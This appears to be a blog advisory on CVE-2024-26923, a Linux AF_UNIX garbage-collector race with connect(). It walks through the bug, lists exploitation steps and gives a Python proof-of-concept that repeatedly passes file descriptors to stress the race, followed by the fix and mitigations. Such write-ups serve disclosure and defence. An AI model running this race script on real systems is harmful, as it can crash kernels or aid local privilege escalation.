CVE-2024-26923 - Linux Kernel AF_UNIX Garbage Collector Race Condition – Details and Exploit Overview
A new Linux kernel vulnerability, CVE-2024-26923, has been patched in recent kernel updates. This particular issue involves a race condition in the way the AF_UNIX (Unix domain sockets) garbage collector interacts with pending connect() operations. This bug could potentially lead to elevated inflight reference counts and dangling pointers, destabilizing the socket infrastructure and opening potential security holes.
In this post, I’ll break down the vulnerability, show code snippets, explain a possible exploitation scenario, and point you to authoritative references.
1. What is AF_UNIX and Inflight Garbage Collection?
AF_UNIX sockets are commonly used for local interprocess communication (IPC) in Linux. The kernel manages these sockets, and periodically a garbage collector (GC) runs to clean up orphaned and unreachable sockets.
Sockets can transmit file descriptors between processes using SCM_RIGHTS. This creates more complex reference graphs, leading the kernel to keep careful inflight reference counts to avoid premature garbage collection before all references have been dropped.
A new connection (an "embryo") is being added to a listening socket while
- The garbage collector is scanning references and possibly acting to collect unreferenced sockets.
The GC does not protect against new embryos being enqueued during collection. If such a connecting socket receives file descriptors (via SCM_RIGHTS), then scan_children in the garbage collector can see a *different* set of children during two passes. This can corrupt the inflight reference count, and worse, dangling pointers may be put into the GC data structures.
Let’s step through a sequence (simplified)
// Setup: AF_UNIX/SOCK_STREAM sockets
int S = socket(AF_UNIX, SOCK_STREAM, ); // Unconnected socket
int L = socket(AF_UNIX, SOCK_STREAM, ); // Listening socket, bound
// V's fd will be passed via SCM_RIGHTS
int V = ...; // (another socket or fd)
// Fork/clone or use threads to race
connect(S, addr); // Attempt to connect S to listener L
sendmsg(S, [V]); // Send V via SCM_RIGHTS
close(V); // Close the original reference
/* In parallel, garbage collector runs in the kernel:
__unix_gc();
*/
Code Data Flow Diagram
connect(S, addr)
|
v
sendmsg(S, [V]); close(V)
|
v
[GC runs] scan_children(L)
|
(unix_peer(S) not yet enqueued)
v
__skb_queue_tail(L, skb1) // Now the embryo is added
scan_children(L) // Second pass sees a *different* set
|
inflight count mismatched!
During this time, because the embryo did not appear in the first scan, but does in the second, the reference counts can become inconsistent. The result: a socket's reference count is elevated beyond normal, and a pointer in the inflight gc list is left dangling.
Impact
While the bug is complex, a malicious local user (with permission to create and manipulate sockets) could:
Cause the kernel to keep bogus, stale references to sockets
- Potentially use dangling pointers to trigger further kernel memory corruption or use-after-free conditions
For now, there isn’t a full privilege escalation exploit public, but DoS and stability issues are possible — and kernel bugs of this class sometimes turn out to be exploitable.
To exploit
- Repeatedly and quickly execute connect() and sendmsg() with SCM_RIGHTS transfers to a local AF_UNIX listening socket, while monitoring or waiting for the GC to trigger
Try to cause a child with SCM_RIGHTS to get enqueued mid-collection
- Advanced exploitation would require heap grooming, but the primitive is a refcount and list corruption, which is a classic kernel attack surface.
A simplified PoC sketch in pseudo-code
import socket
import multiprocessing, os, time
def send_fd(sock, fd):
import array
fds = array.array('i', [fd])
sock.sendmsg([b'x'], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, fds)])
def exploit_try(addr_path):
# Child: listener
def listener():
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
os.unlink(addr_path)
except Exception:
pass
s.bind(addr_path)
s.listen(1)
conn, _ = s.accept()
conn.recv(1) # Wait
time.sleep(.1)
p = multiprocessing.Process(target=listener)
p.start()
time.sleep(.01)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
v = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect(addr_path)
send_fd(s, v.fileno())
v.close()
s.close()
p.join()
for _ in range(10000):
exploit_try('/tmp/af_unix_race')
# Try to race and destabilize kernel
Note: This PoC doesn't exploit the bug fully, but repeatedly stresses the race.
The Fix
The upstream patch ensures that the GC safely locks the listening socket's state before running collection:
> If there is a GC-candidate listening socket, lock/unlock its state. This makes GC wait until the end of any ongoing connect() to that socket.
Relevant patch commit: af_unix: Fix garbage collector racing against connect() - kernel.org
Mitigation
Until patched, restrict untrusted local users from creating/unlinking UNIX domain sockets, and avoid granting them the ability to pass file descriptors over sockets. Update your kernel as soon as possible.
5. References
- Patch Commit on kernel.org
- CVE-2024-26923 in NVD
- Linux AF_UNIX Internals Documentation
- LKML Patch Discussion
6. Conclusion
CVE-2024-26923 is an intricate but important Linux kernel bug involving AF_UNIX sockets and the inflight garbage collector. Left unchecked, it could lead to kernel memory corruption and system instability. The kernel team has already merged a fix — so patch your systems!
Stay tuned for further research and potential exploit writeups as this bug evolves.
*(This post is original content tailored for readers new to kernel vulnerabilities. For professional assistance, always consult upstream security advisories and kernel maintainers.)*
Timeline
Published on: 04/25/2024 06:15:57 UTC
Last modified on: 05/04/2025 08:59:47 UTC